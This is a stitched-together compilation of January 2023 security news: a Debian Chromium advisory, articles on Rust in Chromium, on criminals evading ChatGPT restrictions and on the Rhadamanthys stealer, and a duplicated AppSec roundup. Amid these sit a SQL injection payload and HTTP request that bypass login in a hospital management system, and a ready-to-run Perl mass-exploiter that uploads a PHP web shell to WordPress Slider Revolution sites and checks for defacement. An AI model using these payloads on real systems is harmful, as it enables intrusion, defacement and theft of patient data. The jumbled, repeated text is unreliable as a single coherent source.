Debian Linux Security Advisory 5317-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5317-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 13, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-0141 CVE-2023-0140 CVE-2023-0139 CVE-2023-0138                 CVE-2023-0137 CVE-2023-0136 CVE-2023-0135 CVE-2023-0134     CVE-2023-0133 CVE-2023-0132 CVE-2023-0131 CVE-2023-0130     CVE-2023-0129 CVE-2023-0128Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), this problem has been fixed inversion 109.0.5414.74-2~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPBrfQACgkQEMKTtsN8TjbGjQ/+KfI0HcNDER9opW3i/NGsUubDFjtGSH2Bdh0I7CG0MFYo9jWbkskq9F/KjYHgJLTqXEZ7ZUiE/xUYDg20Ad8y1eJ8vZC4dlNaPX1SakdvAPC5HEgPFNjEO60i4SU/9y7+ujHIuuZiX7N7ATXUG7VRBTOCIFRraMzQ7iIFp3XlNPlPhW5T0XHkf+8oCl3ncFE/JCsEL22juORB93/Ws0MD7sc+Zn2F9HtIEc8PFe1PWs9xYqrT3YZXhI6jq77dcJBHzKzehWSOaDwmRWZ/PXjO5z4vM8rpcDOKQaAW55SAszu2BPNRHCph0OEibcg3Tul/sOKcnjAG2UwKf1dVDEwUf6tcvk1/pIdkpVVurH0AHUU86qlLAimDNwIIyNwpxGACaa9d81GjwPp/pR0CcC38ttJaqCQMEf68F65dy/8GFBab/HrB8lDEB2tL/dWCFzWehcfntcr+mVsxktB8mY0FJWC6JIoQPJA3BALmH95duUmDYlcIYsjPipiFj74+IAUijIgVeyCCl/6jJ1TWQSlHuMnMJIVzzGEDH3DGXiLaE2ZRDHap8y/IBbDXeHRZ8YQ1CwBSaTeyHrp7zBPL2iu4LsJzT6c7zijvJClJGHkzhBbUlDyPc4G1ew20p4BnOBTOiDa4Vxyg8NnCREPjHW7oR2S7FhraDjAK/8g4t87cUy8==11U3-----END PGP SIGNATURE-----

Debian Security Advisory 5317-1

**According to the CVSS metric, a successful exploitation could lead to a scope change (S:C). What does this mean for this vulnerability?**

This vulnerability could lead to a browser sandbox escape.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20221216**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20221216)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-21795: Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

Categories: News
Tags: Google

Tags:  Chromium

Tags:  Rust

Tags:  memory safety

Tags:  rule of two

Google has announced that it will support the use of third-party Rust libraries in Chromium which is a step forward in memory safety for the browsers.



(Read more...)




The post Google to support the use of Rust in Chromium appeared first on Malwarebytes Labs.

In a blog by the Chrome security team we learned that the Chromium project is going to support the use of third-party Rust libraries from C++ in Chromium.

This is good news because Rust is a so-called memory-safe programming language. So using it in a widespread program like Chrome and the other members of the Chromium family means that almost everyone can benefit from this step forward.

Besides Google’s own Chrome browser, Microsoft Edge, Opera, and many other browsers are based on Chromium code. Reportedly, there are over 25 million lines of code in 36 programming languages in the Chromium browser codebase.

**Rust**

Rust is a community project and the product is a high-level, general-purpose programming language that enforces memory safety. Rust started in 2006 as a personal project by Mozilla Research employee Graydon Hoare as part of the development of the Servo browser engine. Then, in February 2021, the Servo team was disbanded and the Rust Foundation was announced by its five founding companies (AWS, Huawei, Google, Microsoft, and Mozilla).

Rust is designed to be memory safe, because poor memory management has been the root cause for way too many vulnerabilities, for way too long. Only a few months ago, the NSA urged a shift to memory safe programming languages.

**Memory vulnerabilities**

If you ever read our posts describing security vulnerabilities, you will see a lot of phrases like "buffer overflow", "failure to release memory", "use after free", "memory corruption", and "memory leak". These are all memory management issues. And the best way to prevent memory management issues is to use a memory-safe language, which manages memory automatically instead of relying on a programmer to code things correctly.

In an earlier article about the effects of the introduction of memory safe languages in Android we showed a steady decline of memory safety vulnerabilities in Android. With the introduction of memory-safe languages like Kotlin, Java, and Rust in the development of the Android operating system, the contributions to the software that ties everything together in the background coded in C and C++ have gone down considerably.

**Rule of two**

Google’s goals for allowing the use of Rust libraries in Chromium are to provide a simpler and safer way to satisfy the rule of two, in order to speed up development and improve the security of Chrome.

The rule of two is demonstrated in the image below:

_Image courtesy of Google_

It says not to pick more than two of these possibly unsafe circumstances:

*   untrustworthy inputs
*   unsafe implementation language
*   high privilege

By eliminating the “code written in an unsafe language” factor wherever you can, you lessen the need to run code in a sandbox. So, there is less code needed and less need for security reviews. This speeds up development while improving the security. Eliminating the untrustworthy input is almost impossible when you are working on a browser.

The Chrome browser runs as an OS-level account representing a person which is considered a high privilege. In Chrome, sandboxing is applied to attain privilege reduction, which means running the code in a process that has had some or many of its privileges revoked.

**Libraries**

Rust was set out to be the foundation for a secure browser and has already proven its use in a browser for Mozilla. But for now, Google will only support third-party libraries. Third-party libraries are written as standalone components, they don’t hold implicit knowledge about the implementation of Chromium.

For future developments, Google is investing in Crubit, an experiment in how to increase the fidelity of interop between C++ and Rust and express or encapsulate the requirements of each language to the other.  Interop refers to two or more browsers behaving the same.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Google to support the use of Rust in Chromium

By Waqas
One of the threat actors inquired about the ideal way to use a stolen payment card to purchase an upgraded user on OpenAI.
This is a post from HackRead.com Read the original post: Russian Hackers Eager to Bypass OpenAI’s Restrictions to Abuse ChatGPT

Russian hacker forums have been flooded with queries wondering how hackers can bypass OpenAI’s restrictions to exploit ChatGPT for spreading malware and other day-to-day criminal operations.

Hackread.com earlier **reported** how hackers are abusing ChatGPT to deploy malware. As per the latest news, Russian hackers are now trying to bypass OpenAI restrictions to exploit ChatGPT for malicious purposes.

According to Check Point Research (CPR), Russian hackers are trying to bypass OpenAI‘s restrictions for the malicious use of ChatGPT. For your information, ChatGPT is an OpenAI-owned chatbot launched in November 2022.

An article published on a Russian hacker forum (Image shared with Hackread.com by Check Point)

It is designed on the GPT-3 family of large language models and has been fine-tuned with reinforcement and supervised learning techniques. Its core function is mimicking human conversations, but the chatbot is highly versatile and features voice improvisation skills. 

Such as it can debug or write computer programs for composing music, fairy tales, teleplays, and even essays. Moreover, it can answer test questions, write poetry and lyrics, and emulate a Linux system.

**Russian Hackers and ChatGPT**

Given its versatility, Russian hackers are looking to bypass OpenAI’s API restrictions to access this chatbot. Check Point researchers identified discussions on underground hacking forums where threat actors shared details on how to circumvent IPs, phone numbers, and payment card restrictions, which are essential for using this platform from Russia.

Threat Intelligence Group Manager at Check Point Software Technologies, Sergey Shykevich, said that it isn’t challenging to bypass OpenAI’s restrictions for specific countries as it is easier there to access ChatGPT.

“Right now, we are seeing Russian hackers already discussing and checking how to get past the geofencing to use ChatGPT for their malicious purposes. We believe these hackers are most likely trying to implement and test ChatGPT into their day-to-day criminal operations.”

CPR has shared screenshots of these discussions. In one of the threads, a threat actor inquired about the ideal way to use a stolen payment card to purchase an upgraded user on OpenAI.

(Image shared with Hackread.com by Check Point)

In another thread, a cybercriminal is asking about bypassing the platform’s Geo Controls. In the third screenshot.

The third screenshot shows a tutorial shared on the hacking forums in Russian semi-legal online SMS services and how to use them to register ChatGPT.

(Image shared with Hackread.com by Check Point)

“Cybercriminals are growing more and more interested in ChatGPT because the AI technology behind it can make a hacker more cost-efficient,” Shykevich added.

**What if cyber criminals use AI?**

Artificial Intelligence **(AI) has been a boon to cybersecurity companies** and countless businesses, allowing them to automate processes and optimize their performance. But what if this powerful technology was used for nefarious purposes? Recent reports suggest that advances in AI are making it easier for cybercriminals to launch attacks on networks and steal valuable data.

Cybercriminals have long relied on automation tools to hide their activities from detection, but with the help of AI, they can take these tactics one step further. For example, attackers can use deep learning algorithms and natural language processing techniques to create more convincing phishing emails that can be used as part of larger schemes.

In addition, AI-based malware is becoming increasingly sophisticated, enabling it to evade traditional security measures like **anti-virus software** and **firewalls**.

1.  AI-based Model to Predict Extreme Wildfire Danger
2.  Website uses AI to create utterly realistic human faces
3.  Microsoft patent reveals chatbot to talk to dead people
4.  This AI Can Generate Unique and Free Bored Ape NFTs
5.  AI-Powered Smart Glasses Give Deafs Power of Speech
6.  ‘Fawkes’ privacy tool blocks images from facial recognition
7.  Retired Software Exploited To Target Power Grids, Microsoft
8.  Spyware Vendor Exploited Chrome, Firefox, Windows 0-days

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Russian Hackers Eager to Bypass OpenAI’s Restrictions to Abuse ChatGPT

Hospital Management System v1.0 is vulnerable to SQL Injection. Attackers can gain administrator privileges without the need for a password.

**CVE Disclosures**

Author: Frank Zeng

**The CVE ID for the entry： **CVE-2022-46093****

**A prose description:** SQL injection vulnerability in Hospital Management System via **a crafted POST request** to /Hospital-Management-System-master/func3.php.

**Root Cause and Impact:** Although the user name is restricted on the front page of the administrator login, the password is not effectively restricted and validated, allowing the attacker to use the vulnerable code for sql injection attacks. The sql statement executed on the server is as follows: select \* from admintb where username='admin@admin.com' and password='1' or username='admin';

Then,attackers can use the administrator permission to steal the information of hospitals, doctors, and patients, and perform some privileged operations, such as managing doctors.

**The name of an affected Product:** Hospital Management System

**The affected or fixed version:** v1.0

**Vendors:** https://github.com/kishan0725/Hospital-Management-System

**Vulnerability Type:** SQL Injection of Post Type

**Payload:** username1=admin%40admin.com&password2=1%27+or+username%3D%27admin&adsub=Login

**HTTP Request:**

POST /Hospital-Management-System-master/func3.php HTTP/1.1
Host: localhost
Content-Length: 77
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/Hospital-Management-System-master/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=99cunoplmskd7cjgrmp5l9unbt
Connection: close

username1=admin%40admin.com&password2=1%27+or+username%3D%27admin&adsub=Login

**Vulnerability url:** /Hospital-Management-System-master/index.php

**Vulnerability location:** /Hospital-Management-System-master/fun3.php

**Proof：**

**Supplementary information：**

**The attack process of manually entering the payload in the login box:**

The sql statement executed on the server is as follows: select \* from admintb where username='admin' and password='1' or username='admin';

Enter in the User Name column of the login box: **admin@admin.com** Enter in the Password column of the login box: **1' or username='admin**

**Request package**：Bypass checking the password

At this time, the password authentication is bypassed and the administrator account is successfully logged in.

Attackers can use the administrator permission to steal the information of hospitals, doctors, and patients, and perform some privileged operations, such as managing doctors.

CVE-2022-46093: z-vulnerabilitys/Hospital-Management-System.md at main · Frank-Z7/z-vulnerabilitys

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

Jessica Haworth 13 January 2023 at 18:31 UTC  
Updated: 16 January 2023 at 14:29 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

  

Slack suffered a security breach recently, “involving unauthorized access to a subset of Slack’s code repositories” according to the messaging platform.

The company said that although no customers were affected, an internal investigation revealed that an unknown actor downloaded private code repositories on or around December 27.

“We discovered that a limited number of Slack employee tokens were stolen and misused to gain access to our externally hosted GitHub repository,” a statement read.

“No downloaded repositories contained customer data, means to access customer data or Slack’s primary codebase.”

Identity management company Okta also fell victim to a breach when an unknown actor accessed its code repositories.

The incident occurred “in early December 2022”, the vendor said, without confirming whether or not any data was stolen.

It did confirm that it “promptly placed temporary restrictions on access to Okta GitHub repositories and suspended all GitHub integrations with third-party applications”.

And over in the US, a government watchdog spent $15,000 to build a password-cracking program – only to discover employees were using easily-guessable credentials all along.

The complicated software, financed by the Department of the Interior, was designed to take on tasks such as recovering hashed passwords.

However it ultimately found that it was able to recover nearly 14,000 employee passwords, – 16% of all department accounts – due to “easily cracked passwords, lack of multifactor authentication, and other failures”.

Among other stories from The Daily Swig in recent days were secure messaging app Threema disputing the seriousness of flaws in its software, developers being urged to rotate secrets in CircleCI due to a security breach, and cross-origin resource (CORS) misconfigurations in the environments of enterprises including Tesla that left internal networks vulnerable.

Here are some other web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   Cisco / Critical / RCE, authentication bypass vulnerabilities / Disclosed with patch, January 11
*   CKEditor / Critical / CSRF vulnerability in CKEditor can lead to RCE (remote code execution) in XWiki / Patched in CKEditor Integration version 1.64.3
*   Mozilla / Moderate / Attacker could inject markup due to the fact Firefox failed to implement the unsafe-hashes CSP (content security policy) directive / Disclosed with patch, December 13
*   VMWare / Critical / Command injection, directory traversal vulnerabilities / Patched in VMWare vRealize Network Insight v6.8
*   Zoom / Medium, High / Path traversal, local privilege escalation bugs for Windows, Android, MacOS clients / Patched January

**Research and attack techniques**

*   Researchers from Sonarsource discovered a command injection vulnerability as well as an authentication bypass vulnerability in open source web-based monitoring tool Cacti which allowed unauthenticated exploitation.
*   A malicious Python file found on the PyPi repository adds backdoor and data exfiltration features to what appears to be a legitimate SDK (software development kit) client from security firm SentinelOne, researchers at ReversingLabs have reported.
*   Also concerning PyPi, researcher Tom Forbes found 57 valid AWS keys present on the Python package index belonging to Amazon, Intel, and other organizations by scanning new packages with GitHub Actions.
*   A research team from Imperva demonstrated how they discovered a vulnerability in Google Chrome that led to the theft of sensitive files, such as crypto wallets and cloud provider credentials.
*   And Harsh Bothra from Cobalt released this handy write up on how pen testers can spot prototype pollution-style attacks.
**Bug bounty/vulnerability disclosure**

*   Researcher Matt Kunze netted a $107,500 bug bounty reward from Google for reporting vulnerabilities in the Google Home Mini smart speaker which allowed him to access the microphone on the device and make arbitrary HTTP requests on the local network.
*   Security firm CloudSek released BeVigil, a tool to enable bug bounty hunters to find and report vulnerabilities in mobile apps.
*   And hacker Jerry Gamblin published this extensive guide on the CVE year in review, featuring data on assigned vulnerabilities from the year 2022.
**New open source infosec/hacking tools**

*   GCP Goat is a vulnerable cloud infrastructure tool featuring the latest released OWASP Top 10 web application security risks and other misconfiguration, designed to help test developers test their code in a cloud environment.
*   Another cloud-based tool, PEACH is a tenant isolation framework for cloud applications to help protect against malicious actors accessing “data belonging to other customers”, for example, in cases such as ChaosDB, ExtraReplica, and AttachMe.
*   Open source tool sbom-utility has been released, an API platform for validating, querying, updating, and managing standardized SBOMs.
**For devs**

*   Exact Realty has released this blog post explaining how developers can defend against introducing cross-site request forgery (CSRF) vulnerabilities into websites.
*   Google’s Chromium project now supports the use of third-party Rust libraries from C++, and will include Rust code in the Chrome binary “within the next year”.
**For fun**

Finally, SplendidData’s bonkers bug bounty program policy was subject to online infosec scrutiny recently.

The rules date back to at least early 2021, however it still sparked a lively discussion thread on Twitter over the last week as some of its questionable terms were highlighted.

Its policy boasts guidance such as ‘we will not respond to your request’ and that the company ‘cannot guarantee’ that no legal action will be taken, even if the vulnerability was disclosed responsibly.

Unsurprisingly, this spread like wildfire on infosec Twitter with one user called TJ joking: “I like the “we MIGHT sue you, idk” aspect… adds a little excitement to life.”

RECOMMENDED Prototype pollution-like bug variant discovered in Python

Deserialized web security roundup – Slack and Okta breaches, lax US government passwords report, and more&nbsp;

Jessica Haworth 13 January 2023 at 18:31 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

  

Slack suffered a security breach recently, “involving unauthorized access to a subset of Slack’s code repositories” according to the messaging platform.

The company said that although no customers were affected, an internal investigation revealed that an unknown actor downloaded private code repositories on or around December 27.

“We discovered that a limited number of Slack employee tokens were stolen and misused to gain access to our externally hosted GitHub repository,” a statement read.

“No downloaded repositories contained customer data, means to access customer data or Slack’s primary codebase.”

Identity management company Okta also fell victim to a breach when an unknown actor accessed its code repositories.

The incident occurred “in early December 2022”, the vendor said, without confirming whether or not any data was stolen.

It did confirm that it “promptly placed temporary restrictions on access to Okta GitHub repositories and suspended all GitHub integrations with third-party applications”.

And over in the US, a government watchdog spent $15,000 to build a password-cracking program – only to discover employees were using easily-guessable credentials all along.

The complicated software, financed by the Department of the Interior, was designed to take on tasks such as recovering hashed passwords.

However it ultimately found that it was able to recover nearly 14,000 employee passwords, – 16% of all department accounts – due to “easily cracked passwords, lack of multifactor authentication, and other failures”.

Among other stories from The Daily Swig in recent days were secure messaging app Threema disputing the seriousness of flaws in its software, developers being urged to rotate secrets in CircleCI due to a security breach, and cross-origin resource (CORS) misconfigurations in the environments of enterprises including Tesla that left internal networks vulnerable.

Here are some other web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   Cisco / Critical / RCE, authentication bypass vulnerabilities / Disclosed with patch, January 11
*   CKEditor / Critical / CSRF vulnerability in CKEditor can lead to RCE (remote code execution) in XWiki / Patched in CKEditor Integration version 1.64.3
*   Mozilla / Moderate / Attacker could inject markup due to the fact Firefox failed to implement the unsafe-hashes CSP (content security policy) directive / Disclosed with patch, December 13
*   VMWare / Critical / Command injection, directory traversal vulnerabilities / Patched in VMWare vRealize Network Insight v6.8
*   Zoom / Medium, High / Path traversal, local privilege escalation bugs for Windows, Android, MacOS clients / Patched January

**Research and attack techniques**

*   Researchers from Sonarsource discovered a command injection vulnerability as well as an authentication bypass vulnerability in open source web-based monitoring tool Cacti which allowed unauthenticated exploitation.
*   A malicious Python file found on the PyPi repository adds backdoor and data exfiltration features to what appears to be a legitimate SDK (software development kit) client from security firm SentinelOne, researchers at ReversingLabs have reported.
*   Also concerning PyPi, researcher Tom Forbes found 57 valid AWS keys present on the Python package index belonging to Amazon, Intel, and other organizations by scanning new packages with GitHub Actions.
*   A research team from Imperva demonstrated how they discovered a vulnerability in Google Chrome that led to the theft of sensitive files, such as crypto wallets and cloud provider credentials.
*   And Harsh Bothra from Cobalt released this handy write up on how pen testers can spot prototype pollution-style attacks.
**Bug bounty/vulnerability disclosure**

*   Researcher Matt Kunze netted a $107,500 bug bounty reward from Google for reporting vulnerabilities in the Google Home Mini smart speaker which allowed him to access the microphone on the device and make arbitrary HTTP requests on the local network.
*   Security firm CloudSek released BeVigil, a tool to enable bug bounty hunters to find and report vulnerabilities in mobile apps.
*   And hacker Jerry Gamblin published this extensive guide on the CVE year in review, featuring data on assigned vulnerabilities from the year 2022.
**New open source infosec/hacking tools**

*   GCP Goat is a vulnerable cloud infrastructure tool featuring the latest released OWASP Top 10 web application security risks and other misconfiguration, designed to help test developers test their code in a cloud environment.
*   Another cloud-based tool, PEACH is a tenant isolation framework for cloud applications to help protect against malicious actors accessing “data belonging to other customers”, for example, in cases such as ChaosDB, ExtraReplica, and AttachMe.
*   Open source tool sbom-utility has been released, an API platform for validating, querying, updating, and managing standardized SBOMs.
**For devs**

*   Exact Realty has released this blog post explaining how developers can defend against introducing cross-site request forgery (CSRF) vulnerabilities into websites.
*   Google’s Chromium project now supports the use of third-party Rust libraries from C++, and will include Rust code in the Chrome binary “within the next year”.
**For fun**

Finally, SplendidData’s bonkers bug bounty program policy was subject to online infosec scrutiny recently.

The rules date back to at least early 2021, however it still sparked a lively discussion thread on Twitter over the last week as some of its questionable terms were highlighted.

Its policy boasts guidance such as ‘we will not respond to your request’ and that the company ‘cannot guarantee’ that no legal action will be taken, even if the vulnerability was disclosed responsibly.

Unsurprisingly, this spread like wildfire on infosec Twitter with one user called TJ joking: “I like the “we MIGHT sue you, idk” aspect… adds a little excitement to life.”

RECOMMENDED Prototype pollution-like bug variant discovered in Python

Deserialized web security roundup – Slack, Okta security breaches, lax US government passwords report, and more&nbsp;

Rhadamanthys spreads through Google Ads that redirect to bogus download sites for popular workforce software — as well as through more typical malicious emails.

A sneaky new info stealer is sliding onto user machines via website redirects from Google Ads that pose as download sites for popular remote-workforce software, such as Zoom and AnyDesk.

Threat actors behind the new malware strain, "Rhadamanthys Stealer" — available for purchase on the Dark Web under a malware-as-a-service model — are using two delivery methods to propagate their payload, researchers from Cyble revealed in a blog post published Jan. 12.

One is through carefully crafted phishing sites that impersonate download sites not only for Zoom but also AnyDesk, Notepad++, and Bluestacks. The other is through more typical phishing emails that deliver the malware as a malicious attachment, the researchers said.

Both delivery methods pose a threat to the enterprise, as phishing combined with human gullibility on the part of unsuspecting corporate workers continues to be a successful way for threat actors "to gain unauthorized access to corporate networks, which has become a serious concern," they said.

Indeed, an annual survey by Verizon on data breaches found that in 2021, about 82% of all breaches involved social engineering in some form, with threat actors preferring to phish their targets via email more than 60% of the time.

**"Highly Convincing" Scam**

Researchers detected a number of phishing domains that the threat actors created to spread Rhadamanthys, most of which appear to be legitimate installer links for the various aforementioned software brands. Some of the malicious links they identified include: _bluestacks-install\[.\]com, zoomus-install\[.\]com, install-zoom\[.\]com, install-anydesk\[.\]com, and zoom-meetings-install\[.\]com_.

"The threat actors behind this campaign … created a highly convincing phishing webpage impersonating legitimate websites to trick users into downloading the stealer malware, which carries out malicious activities," they wrote.

If users take the bait, the websites will download an installer file disguised as a legitimate installer to download the respective applications, silently installing the stealer in the background without the user knowing, the researchers said.

In the more traditional email aspect of the campaign, attackers use spam that leverage the typical social engineering tool of portraying an urgency to respond to a message with a financial theme. The emails purport to be sending account statements to recipients with a Statement.pdf attached that they are advised to click on so they can reply with an "immediate response."

If someone clicks on the attachment, it displays a message indicating that it's an "Adobe Acrobat DC Updater" and includes a download link labelled "Download Update." That link, once clicked on, downloads a malware executable for the stealer from the URL _"https\[:\]\\\\zolotayavitrina\[.\]com/Jan-statement\[.\]exe"_ into the victim machine's Downloads folder, the researchers said.

Once this file is executed, the stealer is deployed to lift sensitive data such as browser history and various account log-in credentials — including specific technology to target crypto-wallet — from the target's computer, they said.

**The Rhadamanthys Payload**

Rhadamanthys acts more or less like a typical info stealer; however, it does have some unique features that researchers identified as they observed its execution on a victim's machine.

Though its initial installation files are in obfuscated Python code, the eventual payload is decoded as a shellcode in the form of a 32-bit executable file compiled with Microsoft visual C/C++ compiler, the researchers found.

The shellcode's first order of business is to create a mutex object aimed at ensuring that only one copy of the malware is running on the victim's system at any given time. It also checks to see if it's running on a virtual machine, ostensibly to prevent the stealer from being detected and analyzed in a virtual environment, the researchers said.

"If the malware detects that it is running in a controlled environment, it will terminate its execution," they wrote. "Otherwise, it will continue and perform the stealer activity as intended."

That activity includes collecting system information — such as computer name, username, OS version, and other machine details — by executing a series of Windows Management Instrumentation (WMI) queries. That's followed up by a query of the directories of the installed browsers — including Brave, Edge, Chrome, Firefox, Opera Software, and others — on the victim’s machine to search for and steal browser history, bookmarks, cookies, auto-fills, and login credentials.

The stealer also has a specific mandate to target various crypto wallets, with specific targets such as Armory, Binance, Bitcoin, ByteCoin, WalletWasabi, Zap, and others. It also steals data from various crypto-wallet browser extensions, which are hardcoded in the stealer binary, the researchers said.

Other applications targeted by Rhadamanthys are: FTP clients, email clients, file managers, password managers, VPN services, and messaging apps. The stealer also captures screenshots of the victim’s machine. The malware eventually sends all the stolen data to the attackers' command-and-control (C2) server, the researchers said.

**Dangers to the Enterprise**

Since the pandemic, the corporate workforce has become overall more geographically dispersed, posing unique security challenges. Software tools that make it easier for remote workers to collaborate — like Zoom and AnyDesk — have become popular targets not only for app-specific threats, but also for social engineering campaigns by attackers that want to capitalize on these challenges.

And while most corporate workers by now should know better, phishing remains a highly successful way for attackers to gain a foothold in an enterprise network, the researchers said. Because of this, Cybel researchers recommend that all enterprises use security products to detect phishing emails and websites across their network. These should also be extended to mobile devices accessing corporate networks, they said.

Enterprises should educate employees on the dangers of opening email attachments from untrusted sources, as well as downloading pirated software from the Internet, the researchers said. They should also reinforce the importance of using strong passwords and enforce multifactor authentication wherever possible.  

Finally, Cyble researchers advised that as a general rule of thumb, enterprises should block URLs — such as Torrent/Warez sites — that can be used to spread malware.

Sneaky New Stealer Woos Corporate Workers Through Fake Zoom Downloads

WordPress Slider Revolution plugin versions 4.x.x suffer from a remote shell upload vulnerability.

=================================================================================================  
| # Title     : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit   |  
| # Author    : indoushka                                                                       |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)            |   
| # Vendor    : https://www.sliderrevolution.com/                                               |    
| # Dork      : index off revslider\backup                                                      |    
                plugins/revslider/public/assets/css/settings.css                                |  
                revslider.php "index of"                                                      |                                    
                wp-content/plugins/revslider/ 2013                                              |  
=================================================================================================

[+] poc :

[+] Web shell upload :

    The following perl exploit will attempt to upload backdoor through the update_plugin function  
    To use the exploit, be sure to compress the backdoor file with name [revslider.zip]  
  Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension  
    Because the exploit uploads a compressed file to the target

  [+] simple backdoor  :

     <?php  
     $cmd = $_GET['cmd'];  
     system($cmd);  
     ?> 

[+] create a text file with name list.txt to save in it your targets

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :

 #!/usr/bin/perl

 use LWP::UserAgent;

 system(($^O eq 'MSWin32') ? 'cls' : 'clear');

 head();

 my $usage = " \nperl $0 <list.txt>\n perl $0 list.txt";  
die "$usage" unless $ARGV[0];

 open(tarrget,"<$ARGV[0]") or die "$!";  
while(<tarrget>){  
chomp($_);  
$target = $_;

 my $path = "wp-admin/admin-ajax.php";

 print "\nTarget => $target\n";

 my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });  
$ua->timeout(10);  
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");  
my $req = $ua->get("$target/$path");  
if($req->is_success) {  
print "\n  [+] Xploit Possibility Work :3\n \n";

   print "  [*] Try Exploiting Vulnerability\n";  
print "  [*] Xploiting $target\n";

 my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);

 print "  [*] Sent payload\n";

 if ($exploit->decoded_content =~ /Wrong update extracted folder/) {  
print "  [+] Payload successfully executed\n";

 print "  [*] Checking if shell was uploaded\n";  
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content;  
if($check =~/<br>/) {

     print "  [+] Shell successfully uploaded\n";  
    open(save, '>>Shell.txt');  
    print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n";  
    close(save);

  print "  [*] Checking if Deface was uploaded now\n";

 my $def = $ua->get("$target/leet.html")->content;  
if($def = ~/Hacked/) {

 print "  [+] Deface uploaded successfull\n";

  } else {print "   [-] Deface not Uploaded :/"; }  
} else { print "  [-] I'think Shell Not Uploaded :/\n"; }  
} else {  
print "  [-] Payload failed: Fail\n";  
print "\n";

 }  
} else { print "\n [-]Xploit Fail \n"}

 sub head {  
print "\t   +===============================================\n";  
print "\t   | Auto Exploiter Revslider Shell Upload \n";  
print "\t   | Edited: indoushka\n";  
print "\t   +===============================================\n";  
}  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |  
                                                                                                                                      |  
=======================================================================================================================================

WordPress Slider Revolution 4.x.x Shell Upload

Categories: Personal
The Internet is kind of like the Wild West when it comes to threats to our privacy and security. But Malwarebytes can help you become the sheriff of your own digital frontier.



(Read more...)




The post 3 ways Malwarebytes helps you browse securely and privately online appeared first on Malwarebytes Labs.

Malicious links. Third-party ad trackers. Information-gobbling data brokers.

Let’s face it, the Internet is kind of like the Wild West when it comes to threats to our privacy and security. And unfortunately, it takes a little more than a cowboy hat and a pistol to defend yourself out there.

That’s where Malwarebytes Premium + Privacy VPN comes in.

Whether it's blocking unwanted trackers, securing your personal information, or booting malware off your devices, here are three ways Malwarebytes can help you become the sheriff of your own digital frontier.

**1\. Let’s you browse anonymously**

It’s no secret that some companies are big fans of your personal information.

Your name, your address, location data, and more, are all being collected, packaged up, and sold to advertisers at any given moment. Even menstrual cycle data is fair game.

